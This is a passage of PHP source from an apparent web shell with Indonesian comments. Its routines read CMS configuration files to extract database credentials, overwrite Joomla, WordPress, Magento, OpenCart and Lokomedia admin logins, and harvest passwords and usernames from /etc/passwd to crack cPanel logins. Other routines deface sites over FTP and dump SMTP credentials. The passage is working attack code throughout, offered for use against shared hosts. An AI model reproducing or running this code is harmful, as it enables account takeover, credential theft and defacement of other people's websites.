file_get_contents("$conf/$file_conf");\r\n\t\t\t\tif(preg_match("/JConfig|joomla/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"host = \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"user = \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"password = \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"db = \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"dbprefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[\'id\'];\r\n\t\t\t\t\t$site = ambilkata($config,"sitename = \'","\'");\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Joomla<br>";\r\n\t\t\t\t\tif($site == \'\') {\r\n\t\t\t\t\t\techo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Sitename => $site<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/WordPress/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"table_prefix  = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[ID];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/wp-login.php\' target=\'_blank\'><u>$target/wp-login.php</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user_baru\',user_pass=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Wordpress<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");\r\n\t\t\t\t\t$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");\r\n\t\t\t\t\t$prefix = $dbprefix."admin_user";\r\n\t\t\t\t\t$option = $dbprefix."core_config_data";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$q2 = mysql_query("SELECT * FROM $option WHERE path=\'web/secure/base_url\'");\r\n\t\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t\t$target = $result2[value];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/admin/\' target=\'_blank\'><u>$target/admin/</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Magento<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"\'DB_HOSTNAME\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"\'DB_USERNAME\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"\'DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"\'DB_DATABASE\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"\'DB_PREFIX\', \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."user";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[user_id];\r\n\t\t\t\t\t$target = ambilkata($config,"HTTP_SERVER\', \'","\'");\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE user_id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => OpenCart<br>";\r\n\t\t\t\t\techo $url_target;\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,\'server = "\',\'"\');\r\n\t\t\t\t\t$dbuser = ambilkata($config,\'username = "\',\'"\');\r\n\t\t\t\t\t$dbpass = ambilkata($config,\'password = "\',\'"\');\r\n\t\t\t\t\t$dbname = ambilkata($config,\'database = "\',\'"\');\r\n\t\t\t\t\t$prefix = "users";\r\n\t\t\t\t\t$option = "identitas";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$target = $result[alamat_website];\r\n\t\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\t\t$target2 = $result[url];\r\n\t\t\t\t\t\t$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t\tif($target2 == \'\') {\r\n\t\t\t\t\t\t\t$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$cek_login3 = file_get_contents("$target2/adminweb/");\r\n\t\t\t\t\t\t\t$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");\r\n\t\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/adminweb\' target=\'_blank\'><u>$target2/adminweb</u></a><br>";\r\n\t\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2/lokomedia/adminweb\' target=\'_blank\'><u>$target2/lokomedia/adminweb</u></a><br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$url_target2 = "Login => <a href=\'$target2\' target=\'_blank\'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$cek_login = file_get_contents("$target/adminweb/");\r\n\t\t\t\t\t\t$cek_login2 = file_get_contents("$target/lokomedia/adminweb/");\r\n\t\t\t\t\t\tif(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/adminweb\' target=\'_blank\'><u>$target/adminweb</u></a><br>";\r\n\t\t\t\t\t\t} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target/lokomedia/adminweb\' target=\'_blank\'><u>$target/lokomedia/adminweb</u></a><br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$url_target = "Login => <a href=\'$target\' target=\'_blank\'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE level=\'admin\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Lokomedia<br>";\r\n\t\t\t\t\tif(preg_match(\'/error, gabisa ambil nama domain nya/\', $url_target)) {\r\n\t\t\t\t\t\techo $url_target2;\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo $url_target;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<h1>Auto Edit User Config</h1>\r\n\t\t<form method=\'post\'>\r\n\t\tDIR Config: <br>\r\n\t\t<input type=\'text\' size=\'50\' name=\'config_dir\' value=\'$dir\'><br><br>\r\n\t\tSet User & Pass: <br>\r\n\t\t<input type=\'text\' name=\'user_baru\' value=\'m3r1c4\' placeholder=\'user_baru\'><br>\r\n\t\t<input type=\'text\' name=\'pass_baru\' value=\'m3r1c4\' placeholder=\'pass_baru\'><br>\r\n\t\t<input type=\'submit\' name=\'hajar\' value=\'Submit\' style=\'width: 100px;\'>\r\n\t\t</form>\r\n\t\t<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpanel\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t$dom =  "<font color=red>gabisa ambil nama domain nya</font>";\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t$dom = "<a href=\'http://$dj/\' target=\'_blank\'><font color=lime>$dj</font></a>";\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$dom = "<font color=red>function is Disable by system</font>";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "<br>Succes!".$i." Cpanel from <font color=lime>Allah SWT</font>";\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<form method=\'post\'>\r\n\t\tUSER: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'user_cp\'>";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style=\'width: 450px; height: 200px;\' name=\'pass_cp\'>";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'crack\' style=\'width: 100px;\' value=\'Crack\'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpftp_auto\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t//\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";\r\n\t\t\t\t\t\t\t$ftp_conn = ftp_connect(gethostbyname($_SERVER[\'HTTP_HOST\']));\r\n\t\t\t\t\t\t\t$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);\r\n\t\t\t\t\t\t\tif((!$ftp_login) || (!$ftp_conn)) {\r\n\t\t\t\t\t\t\t\techo "[+] <font color=red>Login Gagal</font><br><br>";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\techo "[+] <font color=lime>Login Sukses</font><br>";\r\n\t\t\t\t\t\t\t\t$fi = htmlspecialchars($_POST[\'file_deface\']);\r\n\t\t\t\t\t\t\t\t$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST[\'deface\'], FTP_BINARY);\r\n\t\t\t\t\t\t\t\tif($deface) {\r\n\t\t\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t\t\techo "[+] <font color=lime>Deface Sukses</font><br>";\r\n\t\t\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t\t\techo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";\r\n\t\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\techo "[+] <a href=\'http://$dj/$fi\' target=\'_blank\'>http://$dj/$fi</a><br><br>";\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\techo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\techo "[-] <font color=red>Deface Gagal</font><br><br>";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "<br>Succes Deface! ".$i." Cpanel From <font color=lime>ALLAH SWT</font>";\r\n\t\t}\r\n\t} else {\r\n\t\techo "<center>\r\n\t\t<form method=\'post\'>\r\n\t\tFilename: <br>\r\n\t\t<input type=\'text\' name=\'file_deface\' placeholder=\'index.php\' value=\'index.php\' style=\'width: 450px;\'><br>\r\n\t\tDeface Page: <br>\r\n\t\t<input type=\'text\' name=\'deface\' placeholder=\'http://www.web-yang-udah-do-deface.com/filemu.php\' style=\'width: 450px;\'><br>\r\n\t\tUSER: <br>\r\n\t\t<textarea style=\'width: 450px; height: 150px;\' name=\'user_cp\'>";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "</textarea><br>\r\n\t\tPASS: <br>\r\n\t\t<textarea style=\'width: 450px; height: 200px;\' name=\'pass_cp\'>";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "</textarea><br>\r\n\t\t<input type=\'submit\' name=\'crack\' style=\'width: 100px;\' value=\'Submit\'>\r\n\t\t</form>\r\n\t\t<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'smtp\') {\r\n\techo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";\r\n\tfunction scj($dir) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t$ambil = str_replace("$", "", $ambil);\r\n\t\t\tif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t$smtp_host = ambilkata($ambil,"smtphost = \'","\'");\r\n\t\t\t\t$smtp_auth = ambilkata($ambil,"smtpauth = \'","\'");\r\n\t\t\t\t$smtp_user = ambilkata($ambil,"smtpuser = \'","\'");\r\n\t\t\t\t$smtp_pass = ambilkata($ambil,"smtppass = \'","\'");\r\n\t\t\t\t$smtp_port = ambilkata($ambil,"smtpport = \'","\'");\r\n\t\t\t\t$smtp_secure = ambilkata($ambil,"smtpsecure = \'","\'");\r\n\t\t\t\techo "SMTP Host: <font color=lime>$smtp_host</font><br>";\r\n\t\t\t\techo "SMTP port: <font color=lime>$smtp_port</font><br>";\r\n\t\t\t\techo "SMTP user: <font color=lime>$smtp_user</font><br>";\r\n\t\t\t\techo "SMTP pass: <font color=lime>$smtp_pass</font><br>";\r\n\t\t\t\techo "SMTP auth: <font color=lime>$smtp_auth</font><br>";\r\n\t\t\t\techo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t$smpt_hunter = scj($dir);\r\n\techo $smpt_hunter;\r\n} elseif($_GET[\'do\'] == \'auto_wp\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\t$title = htmlspecialchars($_POST[\'new_title\']);\r\n\t\t$pn_title = str_replace(" ", "-", $title);\r\n\t\tif($_POST[\'cek_edit\'] == "Y") {\r\n\t\t\t$script = $_POST[\'edit_content\'];\r\n\t\t} else {\r\n\t\t\t$script = $title;\r\n\t\t}\r\n\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t$scan_conf = scandir($conf);\r\n\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', 